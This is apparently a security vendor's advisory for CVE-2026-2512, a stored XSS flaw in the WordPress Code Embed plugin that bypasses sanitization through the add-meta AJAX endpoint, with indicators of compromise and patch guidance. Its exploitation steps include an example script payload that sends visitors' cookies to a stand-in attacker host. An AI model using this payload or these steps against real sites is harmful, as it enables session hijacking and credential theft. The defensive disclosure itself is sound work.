CVE-2026-2512: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-2512 is a Stored Cross-Site Scripting (XSS) vulnerability in the Code Embed plugin for WordPress (also known as Simple Embed Code, by dartiss/davidartiss), affecting all versions up to and including 2.5.1. The flaw allows authenticated attackers with Contributor-level access or above to inject arbitrary web scripts into pages that execute when any user visits the affected page. It was published on March 18, 2026, with a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, ENISA EUVD).

Technical details

The root cause is improper neutralization of input during web page generation (CWE-79). The plugin's sanitization function sec_check_post_fields() is only triggered on the save_post hook; however, WordPress also allows custom fields to be added via the wp_ajax_add_meta AJAX endpoint, which does not trigger save_post. As a result, an attacker can inject malicious script content into custom field meta values through this AJAX endpoint, bypassing sanitization entirely. The ce_filter() function subsequently outputs these unsanitized meta values directly into page content without escaping, enabling persistent script execution (Wordfence, WordPress Trac).

Impact

Successful exploitation allows an authenticated attacker with at minimum Contributor-level access to store malicious JavaScript in WordPress pages, which then executes in the browsers of any user — including administrators — who visits the injected page. This can lead to session hijacking, credential theft, unauthorized administrative actions, defacement, or further compromise of the WordPress site and its users. The changed scope (S:C) in the CVSS vector reflects that the impact extends beyond the attacker's own session to affect other users (Wordfence, ENISA EUVD).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported for CVE-2026-2512 as of the available data. The EPSS score is approximately 0.032%, indicating a low probability of exploitation in the near term. The vulnerability requires at least Contributor-level authentication, which limits the attack surface compared to unauthenticated vulnerabilities. It has not been added to the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence).

Exploitation steps

  1. Gain Contributor Access: Obtain or register a WordPress account with at least Contributor-level privileges on the target site running Code Embed plugin ≤ 2.5.1.
  2. Create or Edit a Post: Navigate to the WordPress post editor to create or edit a post where the Code Embed plugin is active.
  3. Inject via AJAX Endpoint: Instead of saving the post normally (which would trigger save_post and the sanitization function), use the wp_ajax_add_meta AJAX endpoint to add a custom field meta value containing a malicious JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>).
  4. Bypass Sanitization: Because sec_check_post_fields() only runs on save_post, the injected payload is stored in the database without sanitization.
  5. Trigger Execution: When any user (including administrators) visits the page where ce_filter() outputs the unsanitized meta value, the injected script executes in their browser, enabling session hijacking, credential theft, or further attacks (Wordfence, WordPress Trac).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to wp-admin/admin-ajax.php with action=add-meta from Contributor-level accounts, particularly adding custom fields with script tags or encoded JavaScript payloads.
  • Database: Unexpected or suspicious values in the wp_postmeta table associated with posts managed by the Code Embed plugin, containing <script>, javascript:, or encoded variants thereof.
  • Network: Outbound requests from victim browsers to unknown external domains shortly after visiting pages with Code Embed-managed content, potentially indicating script-based data exfiltration.
  • File System: No direct file system artifacts expected, as the payload is stored in the database; however, review plugin files for unauthorized modifications to includes/add-embeds.php or includes/secure.php.

Mitigation and workarounds

Update the Code Embed (Simple Embed Code) plugin to version 2.5.2 or later, which includes the fix applied in changeset 3482994 that addresses the sanitization bypass (WordPress Trac Changeset). As a temporary workaround, restrict Contributor-level user registration and limit the ability of untrusted users to add or edit custom fields. Site administrators should audit existing custom field meta values for suspicious script content. Upgrading to the patched version is the recommended and definitive remediation (Wordfence).

Community reactions

Wordfence disclosed the vulnerability as part of their weekly WordPress vulnerability report for the period of March 16–22, 2026, providing technical details and remediation guidance (Wordfence Blog). No significant broader media coverage or notable researcher commentary beyond the Wordfence disclosure has been identified for this vulnerability.

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management